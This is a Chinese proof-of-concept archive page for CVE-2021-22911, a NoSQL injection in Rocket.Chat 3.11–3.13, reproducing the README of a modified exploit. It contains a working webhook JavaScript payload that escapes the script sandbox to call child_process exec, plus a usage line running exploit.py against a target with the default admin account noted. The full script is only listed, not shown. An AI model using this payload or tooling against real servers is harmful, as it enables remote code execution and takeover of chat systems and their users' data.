POC详情: e2c8cda4098ba47550f20cf9629ad01643241f74

来源
关联漏洞
标题: Rocket.Chat 安全漏洞 (CVE-2021-22911)
描述:Rocket.Chat是一套开源的团队聊天软件。 Rocket.Chat 3.11,3.12和3.13版本存在安全漏洞。该漏洞可能导致未经验证的NoSQL注入。
描述
some small changes to the code by CsEnox
介绍
# CVE-2021-22911-EXP

## Info

Some small changes to the [code](https://github.com/CsEnox/CVE-2021-22911) by CsEnox:

1. Replace the `oathtool` library with the `pyotp` library.
2. Modify the format of the JavaScript script used to construct the webhook.

```javascript
class Script {
  process_incoming_request({ request }) {
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec('your command');
  }
}
```

## Notice

1. You can check if the webhook has been executed successfully using the `wegt` command, provided that you have installed this command in the Docker container.
2. The default administrator username in the code is `admin`.

## Usage

```cmd
python exploit.py -u "user@rocket.local" -a "admin@rocket.local" -t "http://rocket.local"
```

文件快照

[4.0K] /data/pocs/e2c8cda4098ba47550f20cf9629ad01643241f74 ├── [6.4K] exploit.py └── [ 831] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。